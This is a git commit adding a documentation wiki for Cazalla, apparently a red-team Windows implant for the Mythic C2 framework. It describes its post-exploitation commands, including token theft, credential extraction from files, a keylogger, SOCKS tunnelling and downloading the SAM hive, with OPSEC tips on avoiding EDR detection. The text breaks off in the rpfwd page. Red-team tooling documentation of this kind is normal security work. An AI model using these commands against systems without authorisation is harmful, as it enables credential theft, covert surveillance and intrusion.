wiki created
This commit is contained in:
@@ -0,0 +1,31 @@
|
||||
# Documentación de Cazalla
|
||||
|
||||
Esta carpeta contiene la documentación del agente Cazalla que se sirve automáticamente desde el contenedor de documentación de Mythic.
|
||||
|
||||
## Estructura
|
||||
|
||||
- `index.md` - Página principal del agente (portada)
|
||||
- `commands/` - Documentación individual de cada comando
|
||||
- `*.md` - Páginas adicionales (getting-started, features, opsec, etc.)
|
||||
|
||||
## Instalación
|
||||
|
||||
Esta documentación se instala automáticamente cuando instalas el agente Cazalla en Mythic:
|
||||
|
||||
```bash
|
||||
cd ~/Mythic
|
||||
./mythic-cli install github https://github.com/tu-org/Cazalla
|
||||
# o
|
||||
./mythic-cli install folder /path/to/Cazalla
|
||||
```
|
||||
|
||||
## Acceso
|
||||
|
||||
Una vez instalado, la documentación estará disponible en:
|
||||
- `http://tu-servidor:7443/docs/agents/Cazalla`
|
||||
- `http://tu-servidor:7443/docs/agents/Cazalla/commands/<comando>`
|
||||
|
||||
---
|
||||
|
||||
**Desarrollado por:** Kaseya OFSTeam
|
||||
|
||||
@@ -0,0 +1,91 @@
|
||||
+++
|
||||
title = "Cazalla"
|
||||
chapter = true
|
||||
weight = 100
|
||||
+++
|
||||
|
||||
**Cazalla** is a lightweight Windows implant written in C, designed for the [Mythic C2 Framework](https://github.com/its-a-feature/Mythic).
|
||||
|
||||
|
||||
|
||||
## Overview
|
||||
|
||||
Cazalla provides essential post-exploitation capabilities including:
|
||||
|
||||
- **File System Operations** - Navigate, read, write, and manage files
|
||||
- **Process Management** - Enumerate, terminate, and interact with processes
|
||||
- **Token Manipulation** - Steal and impersonate security tokens
|
||||
- **Network Tunneling** - SOCKS5 proxy and reverse port forwarding
|
||||
- **Credential Harvesting** - Automatic credential detection from files
|
||||
- **Keylogging** - Low-level keyboard input capture
|
||||
- **Full Mythic Integration** - Process Browser, File Browser, OPSEC checking
|
||||
|
||||
## Command Categories
|
||||
|
||||
### File System (9 commands)
|
||||
- `ls` - List directory contents
|
||||
- `cd` - Change directory
|
||||
- `pwd` - Print working directory
|
||||
- `cat` - Read file contents
|
||||
- `cp` - Copy files
|
||||
- `mkdir` - Create directory
|
||||
- `rm` - Delete file/directory
|
||||
- `download` - Download file from target
|
||||
- `upload` - Upload file to target
|
||||
|
||||
### Process Management (2 commands)
|
||||
- `ps` - List processes
|
||||
- `kill` - Terminate process
|
||||
|
||||
### Token Operations (5 commands)
|
||||
- `list_tokens` - Enumerate tokens
|
||||
- `steal_token` - Steal process token
|
||||
- `make_token` - Create token from credentials
|
||||
- `rev2self` - Revert to original token
|
||||
- `whoami` - Display current context
|
||||
|
||||
### Network Tunneling (2 commands)
|
||||
- `socks` - Start/stop SOCKS5 proxy
|
||||
- `rpfwd` - Start/stop reverse port forwarding
|
||||
|
||||
### System Operations (4 commands)
|
||||
- `shell` - Execute shell commands
|
||||
- `screenshot` - Capture desktop screenshot
|
||||
- `keylog_start` - Start keylogger
|
||||
- `keylog_stop` - Stop keylogger
|
||||
|
||||
### Control (2 commands)
|
||||
- `sleep` - Adjust beacon interval
|
||||
- `exit` - Terminate agent
|
||||
|
||||
## Key Features
|
||||
|
||||
### Process Browser Integration
|
||||
Cazalla automatically updates Mythic's Process Browser, allowing you to interact with processes directly from the UI.
|
||||
|
||||
### File Browser Integration
|
||||
Seamlessly browse the target's file system through Mythic's File Browser.
|
||||
|
||||
### OPSEC Checking
|
||||
Built-in operational security checking warns operators before executing risky commands.
|
||||
|
||||
### Context Tracking
|
||||
Automatic tracking and display of current working directory and active token impersonation.
|
||||
|
||||
## Installation
|
||||
|
||||
See the [Getting Started Guide] for installation and setup instructions.
|
||||
|
||||
## Documentation
|
||||
|
||||
- **Commands Reference** - Complete documentation of all commands
|
||||
- **Getting Started** - Installation and first steps
|
||||
- **Features Overview** - Detailed feature explanations
|
||||
- **OPSEC Guide** - Operational security considerations
|
||||
- **Usage Examples** - Practical examples and use cases
|
||||
- **Troubleshooting** - Common issues and solutions
|
||||
|
||||
---
|
||||
|
||||
**Developed by:** Kaseya OFSTeam
|
||||
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,50 @@
|
||||
# Cazalla Commands
|
||||
|
||||
Complete documentation for all Cazalla agent commands, organized by category.
|
||||
|
||||
## File System Commands
|
||||
|
||||
- [`ls`](ls.md) - List directory contents
|
||||
- [`cd`](cd.md) - Change directory
|
||||
- [`pwd`](pwd.md) - Print working directory
|
||||
- [`cat`](cat.md) - Read file contents (with credential detection)
|
||||
- [`cp`](cp.md) - Copy files
|
||||
- [`mkdir`](mkdir.md) - Create directory
|
||||
- [`rm`](rm.md) - Delete file/directory
|
||||
- [`download`](download.md) - Download file from target
|
||||
- [`upload`](upload.md) - Upload file to target
|
||||
|
||||
## Process Management Commands
|
||||
|
||||
- [`ps`](ps.md) - List processes
|
||||
- [`kill`](kill.md) - Terminate process
|
||||
|
||||
## Token Operations
|
||||
|
||||
- [`list_tokens`](list_tokens.md) - Enumerate tokens
|
||||
- [`steal_token`](steal_token.md) - Steal process token
|
||||
- [`make_token`](make_token.md) - Create token from credentials
|
||||
- [`rev2self`](rev2self.md) - Revert to original token
|
||||
- [`whoami`](whoami.md) - Display current context
|
||||
|
||||
## Network Tunneling
|
||||
|
||||
- [`socks`](socks.md) - Start/stop SOCKS5 proxy
|
||||
- [`rpfwd`](rpfwd.md) - Start/stop reverse port forwarding
|
||||
|
||||
## System Operations
|
||||
|
||||
- [`shell`](shell.md) - Execute shell commands
|
||||
- [`screenshot`](screenshot.md) - Capture desktop screenshot
|
||||
- [`keylog_start`](keylog_start.md) - Start keylogger
|
||||
- [`keylog_stop`](keylog_stop.md) - Stop keylogger
|
||||
|
||||
## Control Commands
|
||||
|
||||
- [`sleep`](sleep.md) - Adjust beacon interval
|
||||
- [`exit`](exit.md) - Terminate agent
|
||||
|
||||
---
|
||||
|
||||
[Back to Cazalla Documentation](../../../README.md)
|
||||
|
||||
@@ -0,0 +1,56 @@
|
||||
# cat - Read File Contents
|
||||
|
||||
Read and display the contents of a file on the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `cat` command reads and displays the contents of a file on the target system. It automatically detects and extracts credentials from file contents including plaintext passwords, NTLM hashes, and domain credentials.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
cat <file_path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `file_path` (required): Path to the file to read. Supports both absolute and relative paths.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
cat C:\Users\Administrator\Desktop\notes.txt
|
||||
cat config.ini
|
||||
cat C:\Windows\System32\drivers\etc\hosts
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Supports both absolute and relative paths (relative paths are resolved using the current working directory)
|
||||
- Automatically detects and extracts credentials from file contents including:
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[cat] Reading file: C:\Users\Administrator\notes.txt
|
||||
Hello, this is a test file.
|
||||
|
||||
[cat] Credentials detected:
|
||||
- Password: MyPassword123
|
||||
- Hash: aad3b435b51404ee:1234567890abcdef...
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- File reads are logged by EDR/XDR solutions
|
||||
- Accessing sensitive files (System32, Program Files) may trigger alerts
|
||||
- Consider using `download` for large files instead of `cat`
|
||||
|
||||
## Related
|
||||
|
||||
[Credentials Support](../../../features.md#credentials-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,46 @@
|
||||
# cd - Change Directory
|
||||
|
||||
Change the current working directory for the agent.
|
||||
|
||||
## Description
|
||||
|
||||
The `cd` command changes the current working directory for the agent. The new directory is automatically tracked and displayed in the Mythic UI context tabs.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
cd <path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `path` (required): Directory path to change to. Supports both absolute and relative paths.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
cd C:\Users\Administrator
|
||||
cd ..
|
||||
cd Documents
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- The new directory is automatically tracked and displayed in the Mythic UI context tabs
|
||||
- Supports both absolute paths (e.g., `C:\Windows\System32`) and relative paths
|
||||
- The current directory is used by other file system commands when relative paths are provided
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
Changed directory to: C:\Users\Administrator
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[Context Tracking](../../../features.md#context-tracking)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,55 @@
|
||||
# cp - Copy File
|
||||
|
||||
Copy a file from a source location to a destination path on the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `cp` command copies a file from a source location to a destination path on the target system. The destination file will be overwritten if it already exists. This command creates a 'File Write' artifact for tracking purposes.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
cp <source_path> <destination_path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `source_path` (required): Path to the source file
|
||||
- `destination_path` (required): Path where the file will be copied to
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
cp C:\Users\file.txt C:\temp\backup.txt
|
||||
cp source.exe C:\Windows\Temp\malware.exe
|
||||
cp config.ini config.ini.bak
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Supports both absolute and relative paths (relative paths are resolved using the current working directory)
|
||||
- The destination file will be overwritten if it already exists
|
||||
- Creates a 'File Write' artifact for the destination file
|
||||
- Useful for creating backups, moving files, or preparing payloads in staging directories
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[cp] File copied: C:\Users\file.txt -> C:\temp\backup.txt
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- File writes are logged by EDR/XDR solutions
|
||||
- Copying to sensitive locations (System32, Windows, Program Files) may trigger alerts
|
||||
- File write artifacts are automatically tracked
|
||||
|
||||
## Related
|
||||
|
||||
[Artifacts Support](../../../features.md#artifacts-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1105 - Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)
|
||||
@@ -0,0 +1,59 @@
|
||||
# download - Download File from Target
|
||||
|
||||
Download a file from the target system to the Mythic server.
|
||||
|
||||
## Description
|
||||
|
||||
The `download` command downloads a file from the target system to the Mythic server. Files are transferred in 512KB chunks for efficient transmission. Supports files up to 2GB in size.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
download <file_path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `file_path` (required): Path to the file to download. Supports both absolute and relative paths.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
download C:\Users\Administrator\Desktop\important.txt
|
||||
download C:\Windows\System32\config\sam
|
||||
download report.pdf
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Supports files up to 2GB in size
|
||||
- Files are transferred in 512KB chunks for efficient transmission
|
||||
- Supports both absolute and relative paths (relative paths are resolved using the current working directory)
|
||||
- Compatible with Mythic File Browser for interactive file selection
|
||||
- Large files or sensitive files may trigger detection by EDR/XDR solutions and data loss prevention (DLP) systems
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[download] Starting download: C:\Users\important.txt (1024000 bytes)
|
||||
[download] Chunk 1/2 downloaded: 512000 bytes
|
||||
[download] Chunk 2/2 downloaded: 512000 bytes
|
||||
[download] Download complete: C:\Users\important.txt
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- File reads are logged by EDR/XDR solutions
|
||||
- Large downloads generate network traffic and may trigger alerts
|
||||
- Downloading sensitive files (SAM, config files) may trigger DLP systems
|
||||
- Consider using smaller chunk sizes or splitting large files
|
||||
|
||||
## Related
|
||||
|
||||
[File Downloads Support](../../../features.md#file-downloads-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1105 - Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105/)
|
||||
@@ -0,0 +1,38 @@
|
||||
# exit - Terminate Agent
|
||||
|
||||
Instruct the agent to exit and terminate.
|
||||
|
||||
## Description
|
||||
|
||||
The `exit` command instructs the agent to exit and terminate. The agent will perform cleanup operations and then terminate its process. This command is permanent - the agent will stop running and will not check in again.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- The agent will perform cleanup operations and then terminate its process
|
||||
- This command is permanent - the agent will stop running and will not check in again
|
||||
- Use this command when you want to remove the agent from the target system or when operational requirements dictate agent termination
|
||||
- Compatible with Mythic's callback table exit functionality
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[exit] Terminating agent...
|
||||
[exit] Agent exited
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Control
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,53 @@
|
||||
# keylog_start - Start Keylogger
|
||||
|
||||
Start a low-level keyboard logger that captures all keystrokes from the system.
|
||||
|
||||
## Description
|
||||
|
||||
The `keylog_start` command starts a low-level keyboard logger that captures all keystrokes from the system and streams them to Mythic in real-time. Uses Windows keyboard hooking mechanisms (SetWindowsHookEx) to intercept keyboard input at a low level. CRITICAL OPSEC RISK: Keyloggers are extremely detectable by EDR/XDR solutions.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
keylog_start
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
keylog_start
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Captures all keystrokes from the system and streams them to Mythic in real-time
|
||||
- Uses Windows keyboard hooking mechanisms (SetWindowsHookEx) to intercept keyboard input at a low level
|
||||
- CRITICAL OPSEC RISK: Keyloggers are extremely detectable by EDR/XDR solutions, anti-malware, and behavioral analysis engines
|
||||
- Detection is likely within minutes or hours
|
||||
- Always requires approval from a lead operator
|
||||
- Consider alternatives such as credential theft, browser credential extraction, or clipboard monitoring for better OPSEC
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[keylog_start] Starting keylogger...
|
||||
[keylog_start] Keyboard hook installed
|
||||
[keylog_start] Keylogger active
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- **CRITICAL OPSEC RISK**: Extremely detectable
|
||||
- Detection is likely within minutes or hours
|
||||
- Always requires operator approval (OPSEC pre-check blocks execution)
|
||||
- Consider alternatives for better OPSEC
|
||||
|
||||
## Related
|
||||
|
||||
[OPSEC Checking](../../../opsec.md), [Keylogging Support](../../../features.md#keylogging-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** System Operations
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1056 - Input Capture](https://attack.mitre.org/techniques/T1056/)
|
||||
@@ -0,0 +1,42 @@
|
||||
# keylog_stop - Stop Keylogger
|
||||
|
||||
Stop the active keyboard logger and remove the keyboard hooks.
|
||||
|
||||
## Description
|
||||
|
||||
The `keylog_stop` command stops the active keyboard logger and removes the keyboard hooks. This command safely terminates keylogging operations and cleans up the hooking mechanisms.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
keylog_stop
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
keylog_stop
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- This command safely terminates keylogging operations and cleans up the hooking mechanisms
|
||||
- Use this command when keylogging is no longer needed to reduce detection risk and free system resources
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[keylog_stop] Stopping keylogger...
|
||||
[keylog_stop] Keyboard hook removed
|
||||
[keylog_stop] Keylogger stopped
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[Keylogging Support](../../../features.md#keylogging-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** System Operations
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1056 - Input Capture](https://attack.mitre.org/techniques/T1056/)
|
||||
@@ -0,0 +1,54 @@
|
||||
# kill - Terminate Process
|
||||
|
||||
Terminate a process by its Process ID (PID).
|
||||
|
||||
## Description
|
||||
|
||||
The `kill` command terminates a process by its Process ID (PID). The process is immediately terminated using TerminateProcess API. WARNING: Critical system processes (PID 0, 4, 8) are blocked from termination.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
kill <pid>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `pid` (required): Process ID of the process to terminate.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
kill 1234
|
||||
kill 5678
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- The process is immediately terminated using TerminateProcess API
|
||||
- Compatible with Mythic Process Browser for interactive process termination
|
||||
- Automatically removes the killed process from the Process Browser view
|
||||
- WARNING: Critical system processes (PID 0, 4, 8) are blocked from termination to prevent system instability
|
||||
- Creates a 'Process Termination' artifact for tracking
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[kill] Process terminated: explorer.exe (PID: 1234)
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- Process termination is logged by EDR/XDR solutions
|
||||
- Terminating critical processes may trigger alerts
|
||||
- Process termination artifacts are automatically tracked
|
||||
|
||||
## Related
|
||||
|
||||
[Process Browser Integration](../../../features.md#process-browser-integration), [Artifacts Support](../../../features.md#artifacts-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Process Management
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1489 - Service Stop](https://attack.mitre.org/techniques/T1489/)
|
||||
@@ -0,0 +1,50 @@
|
||||
# list_tokens - Enumerate Tokens
|
||||
|
||||
Enumerate and list all available security tokens from running processes on the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `list_tokens` command enumerates and lists all available security tokens from running processes on the target system. Shows detailed token information including user context, privileges, and groups for each process.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
list_tokens
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
list_tokens
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Shows detailed token information including user context, privileges, and groups for each process
|
||||
- Compatible with Mythic Process Browser for interactive token enumeration
|
||||
- Useful for reconnaissance to identify high-value tokens before attempting token theft
|
||||
- Lower detection risk than token theft operations, but token enumeration may still be logged by security tools
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
PID Process Name User Domain Privileges
|
||||
----- ------------------- ---------------------- -------------- -------------------
|
||||
1234 lsass.exe SYSTEM NT AUTHORITY SeDebugPrivilege
|
||||
5678 explorer.exe User DESKTOP-ABC SeChangeNotifyPrivilege
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- Token enumeration may be logged by security tools
|
||||
- Lower risk than token theft, but still detectable
|
||||
- Use for reconnaissance before attempting token theft
|
||||
|
||||
## Related
|
||||
|
||||
[Process Browser Integration](../../../features.md#process-browser-integration), [Token Support](../../../features.md#token-support)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Token Operations
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,51 @@
|
||||
# ls - List Directory Contents
|
||||
|
||||
List directory contents with detailed file information.
|
||||
|
||||
## Description
|
||||
|
||||
The `ls` command lists directory contents with detailed file information including type (File/Directory), size, modification date, and name. It supports wildcards and works seamlessly with Mythic's File Browser for interactive file management.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
ls [path]
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `path` (optional): Directory path to list. If omitted, lists current working directory.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
ls
|
||||
ls C:\Users
|
||||
ls C:\Windows\*.exe
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Supports wildcards (e.g., `*.exe`, `*.txt`)
|
||||
- Displays file type (File/Directory), size, modification date, and name
|
||||
- Compatible with Mythic File Browser for interactive file management
|
||||
- Relative paths are resolved using current working directory
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
Type Size Modified Name
|
||||
------ ---------- ------------------- --------------------
|
||||
File 1024 2024-01-15 10:30:00 file.txt
|
||||
Directory 0 2024-01-15 09:00:00 Documents
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[File Browser Integration](../../../features.md#file-browser-integration)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1083 - File and Directory Discovery](https://attack.mitre.org/techniques/T1083/)
|
||||
@@ -0,0 +1,61 @@
|
||||
# make_token - Create Token from Credentials
|
||||
|
||||
Create a new security token using plaintext credentials and impersonate it.
|
||||
|
||||
## Description
|
||||
|
||||
The `make_token` command creates a new security token using plaintext credentials and impersonates it. Authenticates with the provided domain (or local machine if empty), username, and password using LogonUser API.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
make_token <domain> <username> <password> [logon_type]
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `domain` (required): Domain name (or empty string for local machine)
|
||||
- `username` (required): Username to authenticate as
|
||||
- `password` (required): Password for authentication
|
||||
- `logon_type` (optional): Logon type (default: 9 - NewCredentials)
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
make_token "" Administrator P@ssw0rd123
|
||||
make_token DOMAIN user01 MyPassword
|
||||
make_token WORKGROUP localuser Secret123 9
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Authenticates with the provided domain (or local machine if empty), username, and password using LogonUser API
|
||||
- The logon_type parameter (default: 9 - NewCredentials) determines the authentication type
|
||||
- The impersonation context is automatically tracked and displayed in the Mythic UI
|
||||
- Less detectable than `steal_token` as it doesn't require accessing LSASS memory, but may still generate authentication logs
|
||||
- Use `rev2self` to revert to the original token
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[make_token] Creating token for: DOMAIN\User01
|
||||
[make_token] Authentication successful
|
||||
[make_token] Impersonating user: DOMAIN\User01
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- Authentication events are logged by Windows Event Log
|
||||
- Less detectable than token theft, but still generates logs
|
||||
- Authentication failures may trigger alerts
|
||||
- Use `rev2self` after completing operations to reduce detection risk
|
||||
|
||||
## Related
|
||||
|
||||
[Token Support](../../../features.md#token-support), [Context Tracking](../../../features.md#context-tracking)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Token Operations
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1134 - Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)
|
||||
@@ -0,0 +1,42 @@
|
||||
# mkdir - Create Directory
|
||||
|
||||
Create a new directory on the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `mkdir` command creates a new directory on the target system. It creates parent directories if they don't exist.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
mkdir <path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `path` (required): Directory path to create. Supports both absolute and relative paths.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
mkdir C:\temp\new_folder
|
||||
mkdir staging
|
||||
mkdir C:\Users\Administrator\Documents\Project
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Supports both absolute and relative paths (relative paths are resolved using the current working directory)
|
||||
- Creates parent directories if they don't exist
|
||||
- Useful for creating staging directories, temporary folders, or organizing files during post-exploitation activities
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[mkdir] Directory created: C:\temp\new_folder
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,42 @@
|
||||
# ps - List Processes
|
||||
|
||||
List all running processes on the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `ps` command lists all running processes on the target system. Displays detailed process information including PID, process name, parent PID, architecture, username, and session ID. Automatically updates the Mythic Process Browser.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
ps
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
ps
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Displays detailed process information including:
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
PID Process Name PPID Arch User Session
|
||||
----- ------------------- ----- ----- ---------------------- -------
|
||||
1234 explorer.exe 1230 x64 DESKTOP-ABC\User 1
|
||||
5678 chrome.exe 1234 x64 DESKTOP-ABC\User 1
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[Process Browser Integration](../../../features.md#process-browser-integration)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Process Management
|
||||
**Requires Admin:** No
|
||||
**MITRE ATT&CK:** [T1057 - Process Discovery](https://attack.mitre.org/techniques/T1057/)
|
||||
@@ -0,0 +1,40 @@
|
||||
# pwd - Print Working Directory
|
||||
|
||||
Display the current working directory of the agent.
|
||||
|
||||
## Description
|
||||
|
||||
The `pwd` command displays the current working directory of the agent. This directory is automatically tracked and displayed in the Mythic UI context tabs.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
pwd
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
pwd
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Shows the absolute path that the agent is currently using as its working directory
|
||||
- This directory is automatically tracked and displayed in the Mythic UI context tabs
|
||||
- Useful for verifying the current location before executing file system operations
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
C:\Users\Administrator\Documents
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[Context Tracking](../../../features.md#context-tracking)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,41 @@
|
||||
# rev2self - Revert Token Impersonation
|
||||
|
||||
Revert token impersonation back to the original process token.
|
||||
|
||||
## Description
|
||||
|
||||
The `rev2self` command reverts token impersonation back to the original process token. This command stops impersonating any stolen or created token and returns to the agent's original security context.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
rev2self
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
rev2self
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- This command stops impersonating any stolen or created token and returns to the agent's original security context
|
||||
- The impersonation context in the Mythic UI is automatically cleared
|
||||
- Use this command after completing operations that required elevated privileges to return to a less-privileged context and reduce detection risk
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[rev2self] Reverted to original token
|
||||
[rev2self] Current user: DESKTOP-ABC\OriginalUser
|
||||
```
|
||||
|
||||
## Related
|
||||
|
||||
[Token Support](../../../features.md#token-support), [Context Tracking](../../../features.md#context-tracking)
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** Token Operations
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,49 @@
|
||||
# rm - Delete File or Directory
|
||||
|
||||
Delete a file or directory from the target system.
|
||||
|
||||
## Description
|
||||
|
||||
The `rm` command deletes a file or directory from the target system. WARNING: Deletion of critical system files or directories (System32, Windows, Program Files, etc.) will be blocked for safety.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
rm <path>
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `path` (required): File or directory path to delete. Supports both absolute and relative paths.
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
rm C:\temp\file.txt
|
||||
rm C:\temp\old_folder
|
||||
rm backup.log
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- Supports both absolute and relative paths (relative paths are resolved using the current working directory)
|
||||
- Can delete individual files or entire directories
|
||||
- WARNING: Deletion of critical system files or directories (System32, Windows, Program Files, etc.) will be blocked for safety
|
||||
- Use with caution as deleted files cannot be recovered through this command
|
||||
|
||||
## Output
|
||||
|
||||
```
|
||||
[rm] File deleted: C:\temp\file.txt
|
||||
```
|
||||
|
||||
## OPSEC Considerations
|
||||
|
||||
- File deletions are logged by EDR/XDR solutions
|
||||
- Deleting system files may trigger alerts
|
||||
- Consider the operational impact before deleting files
|
||||
|
||||
---
|
||||
|
||||
**Command Category:** File System
|
||||
**Requires Admin:** No
|
||||
@@ -0,0 +1,61 @@
|
||||
# rpfwd - Reverse Port Forwarding
|
||||
|
||||
Start or stop reverse port forwarding (RPFWD).
|
||||
|
||||
## Description
|
||||
|
||||
The `rpfwd` command starts or stops reverse port forwarding (RPFWD). When started, the agent listens on a local port on the target system. Connections to this local port are forwarded through the agent to Mythic, which then connects to a remote destination.
|
||||
|
||||
## Syntax
|
||||
|
||||
```
|
||||
rpfwd {"action":"start","port":8080,"remote_host":"127.0.0.1","remote_port":80}
|
||||
rpfwd {"action":"stop","port":8080}
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
- `action` (required): Either `"start"` or `"stop"`
|
||||
- `port` (required for start): Local port on the agent to listen on (default: 8080)
|
||||
- `remote_host` (required for start): Remote host to forward connections to
|
||||
- `remote_port` (required for start): Remote port to forward connections to
|
||||
|
||||
## Examples
|
||||
|
||||
```
|
||||
rpfwd {"action":"start","port":8080,"remote_host":"192.168.1.100","remote_port":80}
|
||||
rpfwd {"action":"start","port":3306,"remote_host":"10.0.0.50","remote_port":3306}
|
||||
rpfwd {"action":"stop","port":8080}
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
- When started, the agent listens on a local port on the target system
|
||||
